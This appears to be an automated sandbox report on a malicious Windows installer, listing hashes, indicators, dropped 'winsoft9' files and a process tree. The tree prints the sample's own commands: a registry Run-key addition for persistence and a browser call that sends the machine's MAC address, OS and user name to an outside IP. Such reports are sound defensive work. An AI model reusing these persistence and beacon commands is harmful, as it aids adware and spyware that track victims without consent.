Overview

overview

7

Static

static

3

bd66fd4217...a8.exe

windows7-x64

7

bd66fd4217...a8.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    10/03/2024, 02:14

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    bd66fd42173eeccc30d90f045ee972a8.exe

  • Size

    854KB

  • MD5

    bd66fd42173eeccc30d90f045ee972a8

  • SHA1

    63ade2d8ee6db1c59262a7c7eeb31517e00b5240

  • SHA256

    49a8a1a713da6403155717c8a491fd600e48259fb68239726f067d5b092ac0c0

  • SHA512

    03a6a487e22355609c6cf50def5d5a42c55fc02fdf70bb800cc9b7a3071161031a453277341b2053b5b79f86db796617ab4de0d4329718ca1581fe45a3461366

  • SSDEEP

    24576:cutr5OUiMFgctewIbP9rEgqHudi0PjeDWS8MzXRrlVw/OIzwikys:cuX0ctewIbGl90PiDMMzXBlMCys

Score
7/10
persistenceupx

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 9 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 8 IoCs
    installer
  • Modifies Internet Explorer settings 1 TTPs 63 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bd66fd42173eeccc30d90f045ee972a8.exe
    "C:\Users\Admin\AppData\Local\Temp\bd66fd42173eeccc30d90f045ee972a8.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\3.vbs"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Program Files (x86)\winsoft9\t2.exe
        "C:\Program Files (x86)\winsoft9\t2.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Windows directory
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\SysWOW64\reg.exe
          reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f
          4⤵
          • Adds Run key to start application
          PID:2756
    • C:\Program Files (x86)\winsoft9\test.exe
      "C:\Program Files (x86)\winsoft9\test.exe"
      2⤵
      • Executes dropped EXE
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=62-a2-79-f6-af-31&os=Microsoft Windows XP&flag=09d26333038a7c472394eede1696d1b1&user=test
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2816 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2028
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2816 CREDAT:406530 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2720
    • C:\Program Files (x86)\winsoft9\bho.exe
      "C:\Program Files (x86)\winsoft9\bho.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1668
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
      2⤵
        PID:1984
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:872 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1916

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files (x86)\winsoft9\1.vbs
            Filesize

            155B

            MD5

            e849e17e1406246a7735f6bd56c0746c

            SHA1

            71579dc34f462ba27527537fb721046b9a8ac828

            SHA256

            f1ad4f5cd82f88506daf47972a4aa977bf6a9e2c789f06fa5fafb49d52613328

            SHA512

            d7dfdb1f4c579557ca0530dd91a2c3b3a93f7f13d9b1190fea0f7e06ee23ef909980f7fcb0dd6ffdf4a15d5da4566084c507daa373e299e39721c3fdf08b9fe5

            Download Submit

          • C:\Program Files (x86)\winsoft9\3.vbs
            Filesize

            366B

            MD5

            f6335c3ecedc794942a63f4a035f188d

            SHA1

            77fef7feed8a3ab3e48eb9a47ab19e5f743aa29f

            SHA256

            7289a5e894693eb160fd0db3f93fe01ea4a00d1fa984a181ee417c54212390d0

            SHA512

            4a597baea20244689fd161599e6c0154d9029ab93a33fc333084307d5843a1e74a8ca8abdb7a65fa23e8d768505972b87e90ade0b7af36114190d2e72519bc46

            Download Submit

          • C:\Program Files (x86)\winsoft9\bho.exe
            Filesize

            125KB

            MD5

            9a52ce480d9605c057f3c4e969ab2331

            SHA1

            275bc1076a39ab5dd4055b85555996d32e54e48e

            SHA256

            bab13f59747eef4bb26fa1dbe7ec650cf9ce97fd3429895beafe949725ad9f8f

            SHA512

            3c0093c61d9f0221ea07bc3e0a20775f84e3da934ad1bb7fa040df2626a0c419dcbfceec9674f298d788024ed24aa4c499eadfcbf4d1f8ed49c3c56bb9105776

            Download Submit

          • C:\Program Files (x86)\winsoft9\bho.exe
            Filesize

            369KB

            MD5

            595740b6918236fcc8f40609d6007941

            SHA1

            273b5ffcb10e1ec7173a93cc60678b4e8826bc61

            SHA256

            677c03774bafb3e7582918a28f9b619117f77a7a68b554cc654245834ed0ccaa

            SHA512

            555d1856c119f5a549d3c295fba4da1a57dea1f15e02962cec481c85d7f7679b32cc988ff34def7fde31cd692f8c8f5d2c92f49e7f605eeb36f17ff4a9c38f66

            Download Submit

          • C:\Program Files (x86)\winsoft9\bho.exe
            Filesize

            140KB

            MD5

            57f33b3e32507bdbce3b6a9cade1d124

            SHA1

            565c753abf9fd76b280dade3ffcbec97e0952867

            SHA256

            70a2b210ee73f127d9c4a04b466e660bc25aae242deb65100c549148452d1240

            SHA512

            a15cc6301142c750ecfebb857d711358f1ec8b51936ceb250d1ffc23521258e359168f988ef51634d0d737d55a003e354c06abee6e0b12d47cf98cf812ac84d6

            Download Submit

          • C:\Program Files (x86)\winsoft9\t2.exe
            Filesize

            3.8MB

            MD5

            96f86e7f079f26bd151fa77f60424396

            SHA1

            1ce9f7c495348bfe3c8d8c6fede838023c2226a7

            SHA256

            ea6a0d18af5dac2afd397fcb1bd96f77b58e0c21d1bebd9f81ddbcde9ca7c418

            SHA512

            c260c27cd43fe4fd2b58cf19a1f1bee32a50ac9b80715365a1de2c45f629db51a9fe290d6a5704bb07828bc86d6263c71217aad949320d8ee48e6b1757f70971

            Download Submit

          • C:\Program Files (x86)\winsoft9\t2.exe
            Filesize

            4.1MB

            MD5

            18f39ef6a721dda65fe8721660f06b85

            SHA1

            5c4e0e287105c42fe18cbd0d08b7c34b0ba607b5

            SHA256

            713fe3305e605a3094a87ce96afcb260da9042d7049270e43d70b0bcfe2a11e8

            SHA512

            0177b9a3951245af40a4e2ef2460f60a718ed3e331b7720e877c53c6bad4d440a373405b8ef6768d5e05ba4bfeb99306c79e3d55f3a6ff6fed767e4dac5c8bf2

            Download Submit

          • C:\Program Files (x86)\winsoft9\test.exe
            Filesize

            385KB

            MD5

            ec4a15786595601ede4f15341cfd1cad

            SHA1

            83fe687171764aa93377828a525e784b10ee8ea6

            SHA256

            09b185a6b0bf6a09e0d4d3f567cf43e11f0795ae6e95793c15d3abfec67c8d62

            SHA512

            5f8dc74b95622862fd27afae06c4ee9be5d431e2aa8bb880968ec0264146c633a9ad2f0e2d4dd36b29615cadec4b29a1e54d9203c1975dea37b677c977ecc235

            Download Submit

          • C:\Program Files (x86)\winsoft9\test.exe
            Filesize

            274KB

            MD5

            d5f99cdfbf45ef07fe8dcdd1d5a958b8

            SHA1

            feaf5942bb8b78c1007e985a343f969195b39448

            SHA256

            70d0839df88f3153e19e5bc6765a7f0042b42a941e921a93a6ccf4d80494ca04

            SHA512

            9970bdf316d02765298782fc91b157fb7a3d41ba9e0174b69849d860414ea60bdc0d78fa4623ba5fb8f78c0067f141421683d7d9a742616f51e7e500b1a57e51

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1ED56F1-DE83-11EE-A499-62A279F6AF31}.dat
            Filesize

            5KB

            MD5

            ab4dae924bae21725b0dff81aa799ffc

            SHA1

            810a569b47d17381c4a10e8d7a3a68abf4492b7b

            SHA256

            fc59728e4e02d946212e2213e3cf52b4754ab28e03183dd0fe942e0efa007bb9

            SHA512

            cf289b55424ad9405276a25953938e9cf847c4912837db8a3a8675eff8c614e86d812c4fc1f1578ace147c0911dac9710240a634f267a7ca2877b8b691534837

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\NewErrorPageTemplate[1]
            Filesize

            1KB

            MD5

            cdf81e591d9cbfb47a7f97a2bcdb70b9

            SHA1

            8f12010dfaacdecad77b70a3e781c707cf328496

            SHA256

            204d95c6fb161368c795bb63e538fe0b11f9e406494bb5758b3b0d60c5f651bd

            SHA512

            977dcc2c6488acaf0e5970cef1a7a72c9f9dc6bb82da54f057e0853c8e939e4ab01b163eb7a5058e093a8bc44ecad9d06880fdc883e67e28ac67fee4d070a4cc

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYNL6UIN\errorPageStrings[1]
            Filesize

            2KB

            MD5

            e3e4a98353f119b80b323302f26b78fa

            SHA1

            20ee35a370cdd3a8a7d04b506410300fd0a6a864

            SHA256

            9466d620dc57835a2475f8f71e304f54aee7160e134ba160baae0f19e5e71e66

            SHA512

            d8e4d73c76804a5abebd5dbc3a86dcdb6e73107b873175a8de67332c113fb7c4899890bf7972e467866fa4cd100a7e2a10a770e5a9c41cbf23b54351b771dcee

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYNL6UIN\httpErrorPagesScripts[1]
            Filesize

            8KB

            MD5

            3f57b781cb3ef114dd0b665151571b7b

            SHA1

            ce6a63f996df3a1cccb81720e21204b825e0238c

            SHA256

            46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad

            SHA512

            8cbf4ef582332ae7ea605f910ad6f8a4bc28513482409fa84f08943a72cac2cf0fa32b6af4c20c697e1fac2c5ba16b5a64a23af0c11eefbf69625b8f9f90c8fa

            Download Submit

          • C:\Users\Admin\Favorites\Öйú¸£Àû²ÊƱ£¬ÌåÓý²ÊƱµÄͶעÖÐÐÄ.²ÊƱ´óÓ®¼Ò!.url
            Filesize

            54B

            MD5

            e8ac342b3b3ddc60ef6811cac1b075f7

            SHA1

            808aa362b5eea31f2239c6792dd78fb838bd5492

            SHA256

            d9cba00fdf62eb1ea5d775a5335037810963d4c6f4397b037a9376a4d23b85ab

            SHA512

            552aca4fadac60483501549cc24429b70831546c7ff8f3cab3b5811ed891fd1857ad486f142c36109506678e6ea24cd4853adc618bd92c6c41215df88124c9da

            Download Submit

          • C:\b.txt
            Filesize

            52B

            MD5

            081a7b88bad7ab23d6f8e08d7036510d

            SHA1

            0d4ef96a343f8e9ae6658823234c325d1e04cec3

            SHA256

            7693bdd3f1c506e3b263c0661a8c2f6741b0c7d2833579e82ec2ca8086fb8857

            SHA512

            592463fbec4d8578a59b5d86207ad2716754fd9fc2ec194b8a232a5b13d200f0d5c2ff693daa0ad7a7c99dd3d5ec319d54b7f89dc6cc5033c4bd84072ada79f4

            Download Submit

          • \Program Files (x86)\winsoft9\bho.exe
            Filesize

            165KB

            MD5

            36b7f826364926ad3b1dc75e9f5d14ab

            SHA1

            e6d5971c8ea3be08b85fd76daa109ea9585da1a2

            SHA256

            e6b4c51fb904342e10ab749e4dc3894a61ed87b9d94c25bd5d9d8e9e6b4d0d94

            SHA512

            4b51e54f80267876607a26209321b6d9917235e7cad8f1373346d42a90cd050b9aa05bbd3208bb380651d68a6238626512675c563b962954829a6b7f0209bd22

            Download Submit

          • \Program Files (x86)\winsoft9\bho.exe
            Filesize

            255KB

            MD5

            0a74b3a13dfc9c6d7f6d55615692fa7e

            SHA1

            a825f734655771c4b1c91dc0893989bd12c6f778

            SHA256

            fe1e6ecf084782970bd055fa52036469a98c10d8d888c87437979ae331e73121

            SHA512

            dc0094be79d8021e5c8c651666ff4221e7456e5bb9325fe131e71926901022dbcd4d99476289a0ab00503716c509f9a8cdfa6b1d24e58b87398a27f475643a20

            Download Submit

          • \Program Files (x86)\winsoft9\bho.exe
            Filesize

            47KB

            MD5

            937b9af27b4890de05c67be387b8579d

            SHA1

            4f839c8f0d38f2b82b4434f1b7db31d516cf5d3c

            SHA256

            e1cba4869c2c293b14bf573472b9574cf419a7f171b92fe8b31dfee9738038c1

            SHA512

            944e014ea1eb185edbf572ded17162f9cff102a936779dcbecf6a5ea9857c7d45c4266e3e0083e61800b8ebda7ba59a2abe97ba0c745d61e8269b90c6e833249

            Download Submit

          • \Program Files (x86)\winsoft9\bho.exe
            Filesize

            234KB

            MD5

            7c8d2e40bd2d701a279c8c04b478de17

            SHA1

            1255e6b2ce401bbf3add8649ce5905013cbfcc90

            SHA256

            4971ac4e33679578aee80e39d7360717e7c362d0ae6aaa1c61b77a9018d50149

            SHA512

            a60fa2e835b046487261fe833381a501b5972912ae6719b20d02649d28a250d0898131022b542cec5a115c8d056d8f7685cf6bf41707537e77c3b4e16f475ec4

            Download Submit

          • \Program Files (x86)\winsoft9\bho.exe
            Filesize

            317KB

            MD5

            1c77cc53b04cb999ff2bdd699da3b6ee

            SHA1

            900518d75e954dc8ee2ff38e0749842d564cae22

            SHA256

            5263b5ac6543cdd06f85ddc414433f8030fab633676d19b4817875765dfcfebe

            SHA512

            b8cee14fa5f150f7dc079a838477f5a654bd15cbefc90f8d53b36bed62c1593ca2257e3ef4297f5c356456330851928a9e14defdc95b64092b47b550af55f340

            Download Submit

          • \Program Files (x86)\winsoft9\t2.exe
            Filesize

            4.0MB

            MD5

            de067fde2f48c9dcccd505391714b926

            SHA1

            515e581b853a80f06c1019e96077f641b8d1cbf3

            SHA256

            0aa6297dcede236dabc59fe851838c9e5f66141181cca275141a545bd3e57867

            SHA512

            0439cc481d85ea43c7b83df7e7d3ec76589946264689da7ef5c0c15024ec9ba2069d52800e75519ac676da1a5faa90dce54586d5fecc8968fea37b70a75da511

            Download Submit

          • \Program Files (x86)\winsoft9\t2.exe
            Filesize

            4.1MB

            MD5

            5bda104b949238f504e61b8d4a1b84b3

            SHA1

            1482dc58177865784babf4b946590e87affe1cdc

            SHA256

            90524e467d64dea615a8080f9621126d6ae7218ded83fd67505ffde13a50bce1

            SHA512

            b98d45c75bda8e9a2cac778100fc29b94a8ca84dacf6b829595294f7c63de025f55e8ffeb6fc8ff1938f9dd73bafe2683f6f6b5d33dc23efbe3ea5aad22654d7

            Download Submit

          • \Program Files (x86)\winsoft9\test.exe
            Filesize

            592KB

            MD5

            5bc93f1efcbcaa3c20dce1db769a03ca

            SHA1

            148981067b6bb71807f7278824f06ecdfddcdebb

            SHA256

            908f22435f2ac040cb353c70f30b60218cfeaed60694550be0652c958989835f

            SHA512

            1df7fd5c098f195934589c25dc73ed893c41faac7ea97a091f4aecd606e18d07e6cc3d8a1c510a0f8b1683147f21577a6611df7806f2248bd4cfed92dd4b4033

            Download Submit

          • \Program Files (x86)\winsoft9\test.exe
            Filesize

            556KB

            MD5

            34572dbf58bd379da2a1e46d2ff8002d

            SHA1

            c8ff12527f69030e1d681ca759e67a38e52b2822

            SHA256

            8eca6019af2295c1c6e233d0baf902d94cfd24a599fb894958b1d1b3c4cea151

            SHA512

            8edcf97b9ec02d8edf2ec93adb8832d9b8e68f3fbe52e00096f81145ce61154bf48c5d2e80fd1a0fda906576d4622f7e6e2e6134c0fe22d03e6350190db711cd

            Download Submit

          • memory/2444-104-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

            Download

          • memory/2444-37-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

            Download

          • memory/2656-120-0x0000000005F40000-0x0000000006287000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/2656-131-0x0000000000400000-0x0000000000420000-memory.dmp

            Filesize

            128KB

            Download

          • memory/2656-24-0x0000000000400000-0x0000000000420000-memory.dmp

            Filesize

            128KB

            Download

          • memory/2784-36-0x00000000009B0000-0x00000000009D3000-memory.dmp

            Filesize

            140KB

            Download